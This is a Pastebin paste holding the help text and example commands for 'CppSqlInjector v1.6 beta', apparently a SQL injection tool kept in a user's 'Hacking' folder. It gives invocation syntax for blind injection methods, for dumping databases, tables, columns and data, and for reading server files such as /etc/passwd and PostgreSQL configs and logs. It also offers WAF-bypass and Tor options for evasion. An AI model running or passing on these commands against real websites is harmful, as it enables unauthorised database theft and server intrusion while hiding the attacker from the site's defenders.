Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- My setted up :L C:\Users\samsung\Documents\Hacking\Tools\CppSqlInjector v1.6 beta\"CppSqlInjector v.1.6 beta" url -dbs -log:dumped.txt -andM For Example
- Examples:
- ---------
- Expl1: 'CppSqLinjector.exe' http://127.0.0.1/1.php?id=2 -qM -cls:db:users -log:l
- og1
- Expl2: 'CppSqLinjector.exe' http://127.0.0.1/2.php?pd=1&sk=2 -andM -p:pd=1 -log:
- log2
- Expl3: 'CppSqLinjector.exe' http://127.0.0.1/3.php -andM -POST:fs=1&bh=2 -log:lo
- g3
- Expl4: 'CppSqLinjector.exe' http://127.0.0.1/4.php?id=3 -orM -read1:/etc/passwd
- -log:log4
- Methods:
- --------
- -andM | Uses the And Method(Blind)
- red
- -orM | Uses the Or Method(Blind)
- red
- -qM | Uses the Quotation Marks Method(Blind)
- red
- Logs:
- -----
- -log:File | Logs Dumped Data in File
- red
- Requests:
- ---------
- -POST=PostData | Injects in POST
- -p:Param=Value | Injects the Given Parameter
- Data Retreival:
- ---------------
- -dbs | Get Databases + Schemas in PostgreSql
- -tbs:DB|SCH | Get Tables of a specific Database|Schema
- -cls:DB|SCH:TB | Get Columns of a specific Database|Schema:Tab
- -data:DB|SCH:TB:CL| You got the Idea...
- File Reading:
- -------------
- -read1:FILE | Gets the Content of that File IF possible(MyS
- -read3 | Gets the Names of Log Files(PostgreSql)
- -read4:LogFILE | Gets the Content of that Log IF possible(Post
- -read5 | Gets the Content of Config IF possible(Postgr
- Comparison:
- -----------
- -string:Value | Searches for the Value on a 'TRUE' Page
- Complications:
- --------------
- -si | Uses String Injection|Parantheses|etc...
- -wafbypass | Uses the Auotmatic WAF Bypassing System
- -tor | Uses TOR
- Extras:
- -------
- -frs | Follows Redirections while Injecting
- -nocm | Removes Last Comments (Ex: --) from Sql Query
- -mobile | Uses a Mobile's User Agent
- -help | Shows this Message
- ##### No Method Provided #####
- CppSqlInjector commands
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement